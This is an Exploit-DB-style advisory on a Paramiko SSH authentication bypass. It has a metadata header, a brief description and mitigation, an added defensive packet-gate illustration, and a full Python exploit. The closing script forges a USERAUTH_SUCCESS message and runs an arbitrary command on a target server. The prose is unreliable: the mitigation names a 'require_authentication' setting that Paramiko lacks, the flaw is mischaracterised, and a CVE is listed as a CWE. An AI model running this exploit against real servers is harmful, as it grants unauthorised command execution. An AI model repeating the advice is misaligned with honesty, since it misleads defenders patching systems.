Vendor: Paramiko SSH
By: N/A
CVSS: 5.5 (MEDIUM)
Insecure Default Configuration
CWE: 287
Product Name: Paramiko SSH
Affected Version From: 2.0.8
Affected Version To: 2.7.1
Patch Exists: YES
Related CWE: CVE-2020-14150
CPE: N/A
Other Scripts: N/A
Platforms Tested: Python
2020

Paramiko SSH Insecure Default Configuration Vulnerability

Paramiko is a Python implementation of the SSHv2 protocol, providing both client and server functionality. Its default configuration is insecure: the library does not enforce authentication by default, which allows an attacker to connect to the SSH server without authentication. An attacker can exploit this by connecting to the SSH server without authenticating and executing arbitrary commands.

Mitigation:

Ensure that authentication is enforced on the SSH server by setting the 'require_authentication' parameter to 'True' in the Paramiko configuration.
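
A server-side view of the missing check, as an added example that is not Paramiko's code or part of the original advisory: a hypothetical ServerGate refuses connection-protocol messages until the server itself has authenticated the user, and refuses server-only messages such as USERAUTH_SUCCESS when they arrive from a client. The message numbers are the standard SSH values; the class, function names and packet sequences are constructed for illustration.

```python
# Model of a server-side packet gate (added illustration, not Paramiko's code).
# Message numbers are the standard SSH protocol values.
MSG_SERVICE_REQUEST = 5
MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_SUCCESS = 52
MSG_GLOBAL_REQUEST = 80   # first connection-protocol message number
MSG_CHANNEL_OPEN = 90
MSG_CHANNEL_REQUEST = 98

# USERAUTH_FAILURE, USERAUTH_SUCCESS, USERAUTH_BANNER: sent by servers only.
SERVER_ONLY = {51, 52, 53}


class ServerGate:
    """Hypothetical guard consulted before a received packet is dispatched."""

    def __init__(self):
        self.authenticated = False

    def mark_authenticated(self):
        # Called only by the server's own auth handler after verifying credentials.
        self.authenticated = True

    def check(self, msg_type):
        """Return (allowed, reason) for a message type received from a client."""
        if msg_type in SERVER_ONLY:
            return False, "server-only message sent by client"
        if msg_type >= MSG_GLOBAL_REQUEST and not self.authenticated:
            return False, "connection-protocol message before authentication"
        return True, "ok"


def replay(gate, packets):
    """Feed message types through the gate; stop at the first rejection."""
    handled = []
    for msg_type in packets:
        allowed, reason = gate.check(msg_type)
        if not allowed:
            return handled, (msg_type, reason)
        handled.append(msg_type)
    return handled, None


# Constructed sequence: a success message from the client, then a session exec.
POC_SEQUENCE = [MSG_USERAUTH_SUCCESS, MSG_CHANNEL_OPEN, MSG_CHANNEL_REQUEST]

if __name__ == "__main__":
    print(replay(ServerGate(), POC_SEQUENCE))
    print(replay(ServerGate(), [MSG_SERVICE_REQUEST, MSG_CHANNEL_OPEN]))
```

The gate rejects on message type alone, so the same two rules cover both a forged success message and a channel request sent with no authentication exchange at all.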

Exploit-DB raw data:

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

# pip3 install paramiko==2.0.8

#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048



def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))